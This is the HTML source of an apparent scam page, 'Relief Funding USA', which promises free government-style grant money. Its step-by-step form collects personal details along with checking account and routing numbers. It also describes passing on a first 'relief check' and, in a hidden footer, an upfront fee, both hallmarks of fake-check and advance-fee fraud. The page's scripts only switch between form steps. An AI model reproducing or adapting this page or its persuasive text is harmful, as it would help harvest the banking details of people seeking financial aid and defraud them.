<!doctype html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<title>Relief Funding USA </title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />
    <link rel="shortcut icon" href="logo.jpg" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins">
    
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <style>
        body{
            font-family: 'Poppins-Regular',sans-serif;
            line-height: 1.7;
            font-size: 16px;
            color:#4c4c4c;
        }

      h1{
        font-weight: normal;
        font-family: american typewriter ,sans-serif;
      }
      p{
        font-family: american typewriter ,sans-serif;
      }
      h4{
        color:#053375;
      }
    .intro {
    position: relative; 
    height: 100vh;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
  }
      intro::before {    
      content: "";

      background-size: cover;
      position: absolute;
      top: 0px;
      right: 0px;
      bottom: 0px;
      left: 0px;
      opacity: 0.75;
      }
       
    </style>
</head>

<body>
    <div class="">
        <nav class="navbar navbar-expand-lg navbar-light bg-light" style="z-index: 1;">
            <div class="container-fluid col-12 py-1 px-2 d-lg-none" style="background-color: #0066b2;">
                <a class="navbar-brand text-center" href="#" style=" color: #053375; background-color: #0066b2;">
                  <img src="../loogo.jpg" style="width:215px; height:40px;"  alt="Relief Funding USA">
                </a>
                <a href="../grant/form" >
                <button class="navbar-toggl btn btn-outline-success border border-2 px-3 py-2" href="../grant/form" style="color:white; background-color: red;" type="button" data-bs-toggle="collapse" data-bs-target="" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                  Apply Now
                </button>
          </a>
            <div class="collapse navbar-collapse" id="navbarSupportedContent">
              <ul class="navbar-nav me-auto mb-2 mb-lg-0 " style="color:rgb(190, 150, 103);">
                <li class="nav-item">
                  <a class="nav-link" style="color:white" href="#">Business Grants</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" style="color:white;" href="#">Personal Assistance / Loans</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" style="color:white" href="#">Housing Grants</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" style="color:white" href="#">Education / Tuition</a>
                </li>
              </ul>
              <div class="nav-item text-end">  
                <a href="">
                <button class="btn btn-outline-success border border-2 px-3 py-2" href="" style="color:white; background-color: red;">Apply Now</button>
                </a>
              </div>
            </div>
        </div>
        
        <div class="container-fluid py-2 d-none d-lg-block" style="background-color: white">
            <a class="navbar-brand d-block" href="#" style="color:rgb(202, 167, 167); background-color: #0066b2; width:100%;">
                <img src="../logo.jpg" style="width: 350px; height:75px; margin-left:3.5rem;" alt="Relief Funding USA">
              </a>
          <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
          </button>
          <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav me-auto mb-2 mb-lg-0 " style="color:rgb(190, 150, 103);">
              <li class="nav-item">
                <a class="nav-link" style="color:#053375;" href="#">Business Grants</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" style="color:#053375;;" href="#">Personal Assistance / Loans</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" style="color:#053375;" href="#">Housing Grants</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" style="color:#053375;" href="#">Education / Tuition</a>
              </li>
            </ul>
            <div class="nav-item text-end">  
              <a href="https://www.jotform.com/assign/212041875238050/222778829918072">
              <button class="btn btn-outline-success border border-2 px-3 py-2" href="" style="color:white; background-color: red;">Apply Now</button>
            </a>
            </div>
          </div>
        </div>
      </nav>
    </div>


    <section class="section first justify-content-center px-2 py-2 my-5">
        <div class="container col-lg-7">
            <img class="img-fluid d-none d-lg-block" src="biden.jpg" style="width:100%; height:500px;">

            <img class="img-fluid d-lg-none" src="biden.jpg" style="width:100%; height:300px;">

            <h3 class="py-5" style="font-weight:bold;">Every Year Billions Of Dollar Are Given Away.</h3>

            <p class="mb-5">As you know, each and every year BILLIONS of dollar are awarded to people and organiztions, in the form of free-money and other types of funding. This money comes from all different sources including but not limited to state and federal agencies and through private corporations and foundations. Most people know this money exists, but just do not know where to apply how much they qualify for, or even where to get an application.</p>
            <p class="my-5">American Corporate Giving organization provides 2billion dollars each year to help people pay their bills.</p>


            <form class="my-5">
                <h2>APPLY NOW <span style="color:red;">*</span></h2>

                <div class="form-group">
                    <input class="form-control" name="email" value="">
                    <label><small>Enter your email address</small></label>
                </div>

            

            <div class="mb-5">
                <button  type="button" class="d-none btn btn-light   float-start">Back</button>
                <button  type="button" class="btn btn-primary float-end firstnxt">Next</button>
            </div>
        </div>
    </section>



    <section class="section second justify-content-center px-2 py-2 my-5 shadow bg-body rounded d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Name:</b></label>
                    <div class="col-6">
                        <input name="firstname" class="form-control">
                        <label><small>First Name</small></label>
                    </div>
                    
                    <div class="col-6">
                        <input name="lastname" class="form-control">
                        <label><small>Last Name</small></label>
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light secondbck float-start">Back</button>
                <button  type="button" class="btn btn-primary secondnxt  float-end">Next</button>
            </div> 
        </div>
    </section>



    <section class="section third justify-content-center py-2 my-5 shadow bg-body rounded d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Phone Number: <span style="color:red;">*</span></b></label>
                    <div class="col-4">
                        <input name="areacode" class="form-control">
                        <label><small>Area Code</small></label>
                    </div>
                    
                    <div class="col-8">
                        <input name="phonenumber" class="form-control">
                        <label><small>Phone Number</small></label>
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light thirdbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  thirdnxt float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section fourth justify-content-center py-2 my-5 shadow bg-body rounded d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Age: <span style="color:red;">*</span></b></label>
                    
                    <div class="col-12">
                        <input name="age" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light fourthbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  fourthnxt float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section five justify-content-center py-2 my-5 shadow bg-body rounded d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5">
                
                <div class="form-group mb-5">
                    <label><b>Gender: </b></label>
                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" value="" id="flexCheckDefault">
                        <label class="form-check-label" for="flexCheckDefault">
                          Male
                        </label>
                      </div>
                      <div class="form-check">
                        <input class="form-check-input" type="checkbox" value="" id="flexCheckChecked">
                        <label class="form-check-label" for="flexCheckChecked">
                          Female
                        </label>
                      </div>
                      <div class="form-check">
                        <input class="form-check-input" type="checkbox" value="" id="flexCheckChecked">
                        <label class="form-check-label" for="flexCheckChecked">
                          Other
                        </label>
                      </div>
                </div>

                <div class="row form-group mb-5">
                    <label><b>Address: </b></label>
                    <div class="col-12 my-1">
                        <input name="address" class="form-control">
                        <label><small>Street Address</small></label>
                    </div>

                    <div class="col-12 my-1">
                        <input name="address2" class="form-control">
                        <label><small>Street Address Line 2</small></label>
                    </div>

                    <div class="col-6 my-1">
                        <input name="city" class="form-control">
                        <label><small>City</small></label>
                    </div>

                    <div class="col-6 my-1">
                        <input name="state" class="form-control">
                        <label><small>State/Province</small></label>
                    </div>

                    <div class="col-12 my-1">
                        <input name="address2" class="form-control">
                        <label><small>Postal / Zip Code</small></label>
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light fivebck  float-start">Back</button>
                <button  type="button" class="btn btn-primary fivenxt  float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section six justify-content-center py-2 my-5 shadow bg-body rounded d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5">

                <div class="row form-group mb-5">
                    <label><b>Type of Business: </b></label>
                    <div class="col-12 my-1">
                        <input name="address" class="form-control" style="height:200px;">
                    </div>

                    <div class="col-12 my-1">
                        <label><b>Legal form under Which Business Operates: </b></label>
                        <input name="address2" class="form-control"  style="height:200px;">
                    </div>

                    <div class="col-12 my-1">
                        <label><b>Name of parent Company: </b></label>
                        <input name="city" class="form-control">
                    </div>

                    <div class="col-12 my-1">
                        <label><b>Name of the company Principal Responsible for the business Transaction:</b></label>
                        <input name="state" class="form-control">
                    </div>

                    <div class="col-12 my-1">
                        <label><b>Company Address:</b></label>
                        <input name="address2" class="form-control">
                    </div>

                    <div class="col-12 my-1">
                        <label><b>Company Phone No:</b></label>
                        <input name="address2" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light sixbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary sixnxt  float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section seven justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5">

                <div class="row form-group mb-5">
                    <h3 class="py-5" style="font-weight:bold;">Bank Information For Relief Check.</h3>
                    <p>Please note: The first Relief check issued to you will be sent out by you to the community, a charity service to the masses who're disabled, orphaned, or in rehabilitation; whilst you keep hold of the second check. If you have a disability, whether physical or mental. The Relief Funding USA assists masses specifcally geared towards assisting your educational edeavors, whether for college, rehabilitation, or preschool. Some of the most popular dsadvantaged group grants are: Harry Truman Scholarship program, Rehabilitation Training: Continuing Education Tech-Prep Education Training Interpreters for Indviduals Who Are Deaf & individuals Who Are Deaf-Blind Special Education Preschool Grants.<br>N/B: A specific means of distribution will detailed to you by the Relief Funding Officer.</p>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light sevenbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  sevennxt float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section eight justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Bank Name: <span style="color:red;">*</span></b></label>
                    
                    <div class="col-12">
                        <input name="bankname" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light eightbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary eightnxt  float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section nine justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>How long have you been with your financial institution? : <span style="color:red;">*</span></b></label>
                    
                    <div class="col-12">
                        <input name="instduration" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light  ninebck float-start">Back</button>
                <button  type="button" class="btn btn-primary ninenxt  float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section ten justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Checking Account Number : <span style="color:red;">*</span></b></label>
                    
                    <div class="col-12">
                        <input name="can" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light tenbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary tennxt  float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section eleven justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Routing number : <span style="color:red;">*</span></b></label>
                    
                    <div class="col-12">
                        <input name="rnumber" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light elevenbck float-start">Back</button>
                <button  type="button" class="btn btn-primary elevennxt  float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section twelve justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Do you have a current Loan? : <span style="color:red;">*</span></b></label>
                    
                    <div class="form-group mb-5">
                        <label><b>Gender: </b></label>
                        <div class="form-check">
                            <input class="form-check-input" type="checkbox" value="" id="flexCheckDefault">
                            <label class="form-check-label" for="flexCheckDefault">
                              Yes
                            </label>
                          </div>
                          <div class="form-check">
                            <input class="form-check-input" type="checkbox" value="" id="flexCheckChecked">
                            <label class="form-check-label" for="flexCheckChecked">
                              No
                            </label>
                          </div>
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light twelvebck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  twelvenxt float-end">Next</button>
            </div> 
        </div>
    </section>



    <section class="section thirteen justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>If Yes, How much? :</b></label>
                    
                    <div class="col-12">
                        <input name="loanamt" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light thirteenbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  thirteennxt float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section fourteen justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Relief funding information : <span style="color:red;">*</span></b></label>
                    <p><small>Let us know what makes you an outstanding citien for this relief funding.</small></p>
                    
                    <div class="col-12">
                        <label><b>What unique things would seperate you from other Applicants applying for this money : </b></label>
                        <input name="rnumber" class="form-control" style="height:200px;" placeholder="Type here...">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light fourteenbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary  fourteennxt float-end">Next</button>
            </div> 
        </div>
    </section>


    <section class="section fifteen justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>How did you hear about us :</b></label>
                    
                    <div class="col-12">
                        <input name="loanamt" class="form-control" style="height:200px;">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light  fifteenbck float-start">Back</button>
                <button  type="button" class="btn btn-primary fifteennxt  float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section sixteen justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>Describe in details how you would use this money ? :</b></label>
                    
                    <div class="col-12">
                        <input name="loanamt" class="form-control">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light sixteenbck  float-start">Back</button>
                <button  type="button" class="btn btn-primary sixteennxt  float-end">Next</button>
            </div> 
        </div>
    </section>

    <section class="section seventeen justify-content-center py-2 my-5 shadow bg-body rounded   d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" style="background-color: #E1EBEE;">
                <div class="row form-group mb-5">
                    <label><b>We Rise By lifting Others :</b></label>
                    
                    <div class="col-12 py-2">
                        <p style="height:200px;"></p>
                        <p>contact: (256) 960-8188 for more enquiries.</p>
                    </div>

                    <div class="col-12 py-2">
                        <p style="height:200px;"></p>
                        <p>Please verify that you are human <span style="color:red;">*</span></p>
                            [[captcha]]
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 ">
                <button  type="button" class=" btn btn-light  seventeenbck float-start">Back</button>
                <button  type="button" class="btn btn-success  seventeennxt float-end">Submit</button>
            </div> 
        </form>
            
        </div>
    </section>

    <section class="section eighteen justify-content-center py-2 my-5 shadow bg-body rounded  d-none">
        <div class="container-fluid col-lg-7 ">
            <div class="px-2 py-1 my-5" >
                <div class="row form-group mb-5 text-center justify-content-center">
                    <img src="thanku.jpg" class="px-2 py-2">
                    <h1><label><b>Thank you !</b></label></h1>
                    <p>Your submission has been recieved</p>
                    
                    <div class="col-12">
                    </div>
                </div>
            </div>

            <hr class="my" style="width:100%;">

            <div class="py-5 d-none">
                <button  type="button" class=" btn btn-light   float-start">Back</button>
                <button type="button" class="btn btn-primary   float-end">Next</button>
            </div> 
        </div>
    </section>


    <footer>
      <div class="d-none px-5 py-5" style="background:white;">
        <p>To help provide you with the research help you need to apply, we have a small fee to cover the marketing and research costs associated with locating our database of thousands of applications. The fee is on the first month of access. We also provide you with our GUARANTEE. If you apply to one of the sources on our site and get turned down, we will issue you a refund. All we ask is that you provide us with a copy of your denial letter. You will have 90 days from the date you register to submit your refund along with a copy of your denial letter. You have absolutely nothing to lose! We have the tools and resources to help you in your quest for funding!
        </p>
      </div>
      <div class="d-flex justify-content-center py-3" style="background-color:#053375; color:white;">
        <ul>
          <a href="" class="mx-2" style="color:white;">Business Grants</a>
          <a href="" class="mx-2" style="color:white;">Personal Assistance/Loans</a>
          <a href="" class="mx-2" style="color:white;">Housing Grants</a>
          <a href="" class="mx-2" style="color:white;">Education/Tuition</a>
        </ul>
      </div>
      <div class="text-center px-5 pt-5" style="background-color: black;">
        <p>Relief Funding USA is not a government agency and is not affiliated with the United States Government or any other funding agency. Relief Funding USA supplies training materials on how to apply for funding as well as resources on where to apply.</p><br>

        <a href="" style="text-decoration: none;color:white" class="mt-5">© Relief Funding USA Copyright 2020</a>
      </div>
    </footer>
  
	
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js" integrity="sha512-aVKKRRi/Q/YV+4mjoKBsE4x3H+BkegoM/em46NNlCqNTmUYADjBbeNefNxYV7giUp0VxICtqdrbqU7iVaeZNXA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script>
    <script>
        $(document).ready(function(){   
            //firstdiv         
             $(".firstnxt").click(function(){
                 $(".first").addClass('d-none');
                 $(".second").removeClass('d-none');
                 $(".second").addClass('d-block');
             });

             //second
             $(".secondnxt").click(function(){
                 $(".second").addClass('d-none');
                 $(".third").removeClass('d-none');
             });
             $(".secondbck").click(function(){
                 $(".second").addClass('d-none');
                 $(".first").removeClass('d-none');
             });
    
             //third
             $(".thirdnxt").click(function(){
                 $(".third").addClass('d-none');
                 $(".fourth").removeClass('d-none');
             });
             $(".thirdbck").click(function(){
                 $(".third").addClass('d-none');
                 $(".second").removeClass('d-none');
             });

             //fourth
             $(".fourthnxt").click(function(){
                 $(".fourth").addClass('d-none');
                 $(".five").removeClass('d-none');
             });
             $(".fourthbck").click(function(){
                 $(".fourth").addClass('d-none');
                 $(".third").removeClass('d-none');
             });

             //five
             $(".fivenxt").click(function(){
                 $(".five").addClass('d-none');
                 $(".six").removeClass('d-none');
             });
             $(".fivebck").click(function(){
                 $(".five").addClass('d-none');
                 $(".fourth").removeClass('d-none');
             });

             //six
             $(".sixnxt").click(function(){
                 $(".six").addClass('d-none');
                 $(".seven").removeClass('d-none');
             });
             $(".sixbck").click(function(){
                 $(".six").addClass('d-none');
                 $(".five").removeClass('d-none');
             });


             //seven
             $(".sevennxt").click(function(){
                 $(".seven").addClass('d-none');
                 $(".eight").removeClass('d-none');
             });
             $(".sevenbck").click(function(){
                 $(".seven").addClass('d-none');
                 $(".six").removeClass('d-none');
             });

             //eight
             $(".eightnxt").click(function(){
                 $(".eight").addClass('d-none');
                 $(".nine").removeClass('d-none');
             });
             $(".eightbck").click(function(){
                 $(".eight").addClass('d-none');
                 $(".seven").removeClass('d-none');
             });


             //nine
             $(".ninenxt").click(function(){
                 $(".nine").addClass('d-none');
                 $(".ten").removeClass('d-none');
             });
             $(".ninebck").click(function(){
                 $(".nine").addClass('d-none');
                 $(".eight").removeClass('d-none');
             });


             //ten
             $(".tennxt").click(function(){
                 $(".ten").addClass('d-none');
                 $(".eleven").removeClass('d-none');
             });
             $(".tenbck").click(function(){
                 $(".ten").addClass('d-none');
                 $(".nine").removeClass('d-none');
             });


            //eleven
            $(".elevennxt").click(function(){
                 $(".eleven").addClass('d-none');
                 $(".twelve").removeClass('d-none');
             });
             $(".elevenbck").click(function(){
                 $(".eleven").addClass('d-none');
                 $(".ten").removeClass('d-none');
             });


            //twelve
            $(".twelvenxt").click(function(){
                 $(".twelve").addClass('d-none');
                 $(".thirteen").removeClass('d-none');
             });
             $(".twelvebck").click(function(){
                 $(".twelve").addClass('d-none');
                 $(".eleven").removeClass('d-none');
             });


             //thirteen
             $(".thirteennxt").click(function(){
                 $(".thirteen").addClass('d-none');
                 $(".fourteen").removeClass('d-none');
             });
             $(".thirteenbck").click(function(){
                 $(".thirteen").addClass('d-none');
                 $(".twelve").removeClass('d-none');
             });


             //fourteen
             $(".fourteennxt").click(function(){
                 $(".fourteen").addClass('d-none');
                 $(".fifteen").removeClass('d-none');
             });
             $(".fourteenbck").click(function(){
                 $(".fourteen").addClass('d-none');
                 $(".thirteen").removeClass('d-none');
             });

             
             //fifteen
             $(".fifteennxt").click(function(){
                 $(".fifteen").addClass('d-none');
                 $(".sixteen").removeClass('d-none');
             });
             $(".fifteenbck").click(function(){
                 $(".fifteen").addClass('d-none');
                 $(".fourteen").removeClass('d-none');
             });


             //sixteen
             $(".sixteennxt").click(function(){
                 $(".sixteen").addClass('d-none');
                 $(".seventeen").removeClass('d-none');
             });
             $(".sixteenbck").click(function(){
                 $(".sixteen").addClass('d-none');
                 $(".fifteen").removeClass('d-none');
             });
    
             //seventeen
             $(".seventeennxt").click(function(){
                 $(".seventeen").addClass('d-none');
                 $(".eighteen").removeClass('d-none');
             });
             $(".seventeenbck").click(function(){
                 $(".seventeen").addClass('d-none');
                 $(".sixteen").removeClass('d-none');
             });
    
    
         });
     </script>
</body>
</html>
